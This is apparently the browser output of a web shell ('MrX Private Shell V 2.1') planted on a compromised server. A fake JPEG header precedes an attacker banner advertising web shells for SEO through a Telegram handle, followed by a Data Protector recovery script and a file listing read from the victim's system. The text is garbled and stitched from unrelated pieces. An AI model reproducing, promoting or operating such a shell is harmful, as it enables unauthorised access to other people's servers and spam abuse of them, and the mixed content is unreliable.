����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# 400_verify_dp.sh
# read Data Protector vars from config file
# the Cell Manager must be configured on the client
# if /etc/opt/omni/client/cell_server exists and contains something, we're good
test -s /etc/opt/omni/client/cell_server || Error "Data Protector Cell Manager not configured in /etc/opt/omni/client/cell_server"
CELL_SERVER="$( cat /etc/opt/omni/client/cell_server )"
OMNICHECK=/opt/omni/bin/omnicheck
if [ $ARCH == "Linux-i386" ] || [ $ARCH == "Linux-ia64" ]; then
# check that the Cell Manager is responding on the INET port
${OMNICHECK} -patches -host ${CELL_SERVER} || Error "Data Protector Cell Manager is not responding, error code $?.
See $RUNTIME_LOGFILE for more details."
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 400_verify_dp.sh | File | 714 B | 0644 |
|
| 450_request_gui_restore.sh | File | 918 B | 0644 |
|
| 500_select_dp_restore.sh | File | 6.7 KB | 0644 |
|